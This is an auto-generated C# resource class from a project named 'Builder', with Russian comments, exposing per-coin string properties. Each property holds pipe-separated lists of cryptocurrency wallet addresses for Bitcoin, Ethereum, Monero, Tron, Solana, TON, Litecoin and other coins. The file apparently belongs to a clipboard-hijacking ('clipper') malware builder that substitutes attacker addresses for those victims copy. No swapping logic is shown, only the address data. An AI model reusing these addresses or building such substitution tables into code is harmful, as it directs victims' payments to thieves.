//------------------------------------------------------------------------------
// <auto-generated>
//     Этот код создан программой.
//     Исполняемая версия:4.0.30319.42000
//
//     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
//     повторной генерации кода.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Builder.Properties {
    using System;
    
    
    /// <summary>
    ///   Класс ресурса со строгой типизацией для поиска локализованных строк и т.д.
    /// </summary>
    // Этот класс создан автоматически классом StronglyTypedResourceBuilder
    // с помощью такого средства, как ResGen или Visual Studio.
    // Чтобы добавить или удалить член, измените файл .ResX и снова запустите ResGen
    // с параметром /str или перестройте свой проект VS.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Возвращает кэшированный экземпляр ResourceManager, использованный этим классом.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Builder.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Перезаписывает свойство CurrentUICulture текущего потока для всех
        ///   обращений к ресурсу с помощью этого класса ресурса со строгой типизацией.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на X-avax17hhav4038lmpr89tasfjglv8sfezmv6trqg2ef|X-avax1r8gjpljdrzqxc4xg3j4nstrfa6t4pxzfz0ncsz|X-avax1ndwj2k0uc5jt60uw8t9w5pql4rjclane7tah00|X-avax1r4vztx4chqaqkjxa49heklahpljcuusdjqlp8w.
        /// </summary>
        internal static string avax {
            get {
                return ResourceManager.GetString("avax", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на bitcoincash:qpq3z42yhvf8sqxwvntl0tzfaftft0nhgsrc36vxww|bitcoincash:qrtgpgw2lktwrgtd27mj00dp7y99rqkuy5qjp6lvgq|bitcoincash:qzhhzeht6hnex8duccsyqcss4v6c6dvyggqctap2u0|bitcoincash:qzuxkez2udxh7pvz3dc7sa3y2zf8eyf8cs85w3uuwf|bitcoincash:qzjq8488jf0fv338x2zyjpvquxnp4jfdxqlnrszaqu|bitcoincash:qpg0rn82xd9uckkr736wjmpdpz8g64nfdsf4dszg05|bitcoincash:qz40yfgr3x8xhkhja64y50c3wu6e2jfxcy58u2ptjm|bitcoincash:qqu98ghy0lugskkvmhhgzvks3h3rpux8dqmrm3gr9l|bitcoincash:qqucjhqm5ynwh0fy5dd9w6dswlcp5zg2hsh7xr75rp|bitcoincash:qqcfd [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string bch {
            get {
                return ResourceManager.GetString("bch", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на bnb18ajhl2q9xaf4ve0nklyudem5c5ufn3ugpuhgea|bnb1qeja9g6vskqzk5ka3dvf8sywn52f7ve7ex9yav|bnb1jgtyr30v49d34nlgsam9kl7leu7mhkhsjg8sr5.
        /// </summary>
        internal static string bnb {
            get {
                return ResourceManager.GetString("bnb", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 1Br6Thztoei1HqqGDZY1ksJdn7v4h6kXar|1K3bQ5hyCqouLKGm4YChmu7uDdZo3ucREy|1Pq1nwLoMhTWqzRsAH8t1WrYgBHhHBSciq|1BuKbHhBPURpkRdhW1buD9Bg9h9FMVG4h5.
        /// </summary>
        internal static string btc1 {
            get {
                return ResourceManager.GetString("btc1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 3HxybeHMFdPd8jAyysUR7iyJ12zteJY8VG|3BufmhW2UEeTZq2CVXk3maPesghUubMzsy|37pnNBT1862CKWFqFbDPrYyTCQtSouRP49.
        /// </summary>
        internal static string btc3 {
            get {
                return ResourceManager.GetString("btc3", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на bc1qpapycp55qem39g52k4u6clzxqs0dadtz4x6c2s|bc1qxcqgg8zq5k5nsgewcyfmadudfqmc9yktmzklt7|bc1qlrt7zawzyp8hdd9493m5hej6dsxg8p0l5pezel|bc1qmdln3fdpf5cmx0g575trgt4rppk3ur8nu00mwq.
        /// </summary>
        internal static string btcbc1 {
            get {
                return ResourceManager.GetString("btcbc1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на XqEQRB9LGaZWeipMvgXaRFvCp9qeWe7cP8|Xw1j7wdW4FAsccsxuo3SAeUekcBoFouaL1|Xkb22J8Sy11R9VSVNkBnYb8iZCJQLx9QZ5|Xr1tKt9wvLSrNB1aXfLx1b7FoVdVqztJWa.
        /// </summary>
        internal static string dash {
            get {
                return ResourceManager.GetString("dash", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на D82BbeKdkDrKV9SfXwy8yh9VAMHiW6f3oh|DBvAzS4WCrsqZxzaQVyVycHYogDBfciPUQ|DJnAuhPNWBTVUEFfNMxyi1bZ18FrAqGP2G|DUNJPhYL68eBCYdeKtt4r57U96TGoV74ke|DEtHdZDDjery9mZvkekeApDSGQNFcRo456.
        /// </summary>
        internal static string doge {
            get {
                return ResourceManager.GetString("doge", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 134xJY6VLDGmcxDjwSPwaiYazybnqLUEqWS2q5t51GXEzxdi|169h4TfnZhmx4BUG3jj8Mk5y5bqKsDJT9zihqryFRur8LS1M|13NTgcDLwpepNiuEFUyxn8XPWWqW1DKMSk8tPgZa4Df9X6QN|14XtegjGoNxSczM1NowuFANyniLD5ET2Z2ajyRaREtsBbthi.
        /// </summary>
        internal static string dot {
            get {
                return ResourceManager.GetString("dot", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 0xBE372a40Ea19DB6F4641963B4741B1fF6a0De734|0xCaf2C54E400437da717cF215181B170F65187aBf|0x86e83a28BAc0359Ff6672bB6e1A474E527264641|0x31454F8d1ca0d8efFc3D2a78C2f3602b49D56731|0x41b7B82CDd062FD89AB68b4CdC1F821A25c027bc.
        /// </summary>
        internal static string eth {
            get {
                return ResourceManager.GetString("eth", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Lg4Nm93nSvN777zCPfnujchW4mVW2UZq9J|LXXU7F3oV7iRAjB7s3oxCDqLz5t6hkNLqo|LQfAc23UD8HpCBxBbLFb5StiNnQgszv5kk|LLos2kCxZrYPmtnpg8kBmYfDSh46r6fXQo.
        /// </summary>
        internal static string ltc_l {
            get {
                return ResourceManager.GetString("ltc_l", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Lg4Nm93nSvN777zCPfnujchW4mVW2UZq9J|LXXU7F3oV7iRAjB7s3oxCDqLz5t6hkNLqo|LQfAc23UD8HpCBxBbLFb5StiNnQgszv5kk|LLos2kCxZrYPmtnpg8kBmYfDSh46r6fXQo.
        /// </summary>
        internal static string ltc_ltc1q {
            get {
                return ResourceManager.GetString("ltc_ltc1q", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Lg4Nm93nSvN777zCPfnujchW4mVW2UZq9J|LXXU7F3oV7iRAjB7s3oxCDqLz5t6hkNLqo|LQfAc23UD8HpCBxBbLFb5StiNnQgszv5kk|LLos2kCxZrYPmtnpg8kBmYfDSh46r6fXQo.
        /// </summary>
        internal static string ltc_m {
            get {
                return ResourceManager.GetString("ltc_m", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на NLVEJqzLdr2WZ8V4VHNsWLSAjU9JBVdBEY|AUqHSBDquQDNAh4BoTgVmiJf3WLa1ayYPg|NT7PQvh8WvxDP2EXy5vX7STtxUDJEvvrLU.
        /// </summary>
        internal static string neocoin_nec {
            get {
                return ResourceManager.GetString("neocoin_nec", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на rHcXrn8joXL2Qe7BaMnhB5VRuj1XKEmUW6|rMraf3mhx1434fpUkpUBuWAAUDHk56FKmP|rJDPQSLb8eFatYgJbsAxWVqvx5uo2HBRH.
        /// </summary>
        internal static string ripple_xrp {
            get {
                return ResourceManager.GetString("ripple_xrp", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 3gioeFPF9kAoWyhRJHtJP4sEaWNSZWsCef7wsPepiKXy|35GzZ1CJ3ZdPv5AnpL6tykM3vyCAY6wHUKytmDp2gtDy|3HtwdRhAuA92SsRzzGRm4WvPbNDTZYbqCWa3pW1JUKQT|qBVRXhYmv5hKh7XjeoToG5NahfESTUC7rwkSZZYuVni|2RLZLbjAvqEr6Wmc6NmeLyt1khRjWDuPJR76bPh9iNFQ|CvZ6szHD3t2ZeCicrprFuujzBvynydTVLsfWPUj4v75h|H4d4qJNfxnqTGNnwZu76d92r3NZn947tCn4zuKAoM1A|AiyqMqMaJu9T9SAn7WF5dE6XR53RcdqkGxJk6owTq9Br.
        /// </summary>
        internal static string sol {
            get {
                return ResourceManager.GetString("sol", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на UQDAIt68NHJK31xrD7y6YIpVFRona2k3x99Zcu_TWCr3uelC|UQCRWeiFMqLqkPWP7Ag_eZH_esj8AEYDrfF4feOYmm-nmkp0|UQCq2rqPFIKIELnHU6IctSCa7fhouVTqDtln6LUcEATFlCgi|UQDG99n7uXGaVSJq0DDkS50YHe07fJU4JwNPmDxq2IwHT2Zr|UQAxZRBLrK4Ls1b2H1JF8u3xGnz3qMchdfBFTjJOiFvVhkwH|UQDSoeI4kG_F70r73zQEdfybXDOBMTi9FAE221tc08UqMt80.
        /// </summary>
        internal static string ton {
            get {
                return ResourceManager.GetString("ton", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на TQyW71eg3DZrWEiK4nBKjR6Z7mr2YBhYPo|TAbCekcoiqvqkuW9p27HM1AEmKJ5hcuJES|TYzEHx8KqG6fwLQ8KCUSXxEQS3mBeTN6Xj|TR2LPRaNmXwfBdsVX2FEGjDuNFFQDiA7Gm|TFrkmhK9RazyrYuxeFsAQkZJHHhePEiXxC|TXextjvowwfSr4isT1RJnzmQ6GzPZBMgHz.
        /// </summary>
        internal static string tron {
            get {
                return ResourceManager.GetString("tron", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на GD4SRKQBE757F2CPXCJ4IY7UK6CNH4DPYDP2BRAT3FB6E2K2PKETKSDI|GDDXNO7XIE2KGQNRAU2MG23TA2Y3GWL2BFA5RWCH4PRWPYODBI7E5CQS|GBW7VNP7BKMN4KX2U235VJ7N6AGQELCNWFYVYHW75APIL744UGOXBP6L.
        /// </summary>
        internal static string xml {
            get {
                return ResourceManager.GetString("xml", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 49EbgmxQvXhZNe9uot1Qy3hjJBp8ykAi6UscXirZ4zLH6U4UdRWZrT9REZcd4fg7k9bT3CVBH62u8jE2hPgj7FdE2xtrb25|48Mgxz9sTrpeL9GBr3ec5cFj7jTAykhYweNEmmL87RxvW9cNpdbRLsjRjrRfQT8LhDJirsrwqxqc5A2uRuq3NU87AAtoWPs.
        /// </summary>
        internal static string xmr4 {
            get {
                return ResourceManager.GetString("xmr4", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 89y6ecATJ5FcjMiYycLLSK69d2J75ExrKKvzAXLfqcgRfnnQij8FWHhZKQqSx1rAVzfPNkp8w5NBAb9YETGdK2oCRhV6Eby|84HVonQ1LkqT6ajEAnteszKyJfTuQB3GpBQEurMReC8v1R5gv2MkmuLQ45Dd5E9Fmf35aJcNCMBZF1zhYxaMYTY8GDfxZVa|88dMU54AXXaBXMTUnp8FzMBjq5wRboocBTiW6Pp61LD4Jh5KbC4TJHo7HVi9NbscePKExiY1dUszSdTDQ61qcPE4My3iNHh|8BBCCTz2R3pTYGe3rnWEKt7pqSo82cjK59Dedu28NBUXKTG1ADrq7QkabEppGFLJj8AnWPD8u4bM4gj5sUopLney6t1wumk|87bhwKYoEUUXpPKq4MMhPmUH6RV35dregggLU892jDNw9JagVAzCgW3dz6htDL96MkhSCTCUyRtBDhXwzf2Ng4P83Njt4PZ|8C7EFTFrHFCdoVCNPvTuxX3iiQhmAYC3 [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string xmr8 {
            get {
                return ResourceManager.GetString("xmr8", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на t1MDi8hrEdHjiRpPvzmWgb2D1hsRnoDpnUH|t1aAe7CBXgrzA5fqECB9K8us5ycSHgaCe3x|t1W9TsJJWJMdRFs6yFYKxPuptU4QrtL82hM|t1ZWsLNQgFzPHqeXLzgqGjfCugGSS6GsmMr|t1YQQP6i5zMHAbuoiTSTmr3pwWJoZur66nQ.
        /// </summary>
        internal static string zcash {
            get {
                return ResourceManager.GetString("zcash", resourceCulture);
            }
        }
    }
}
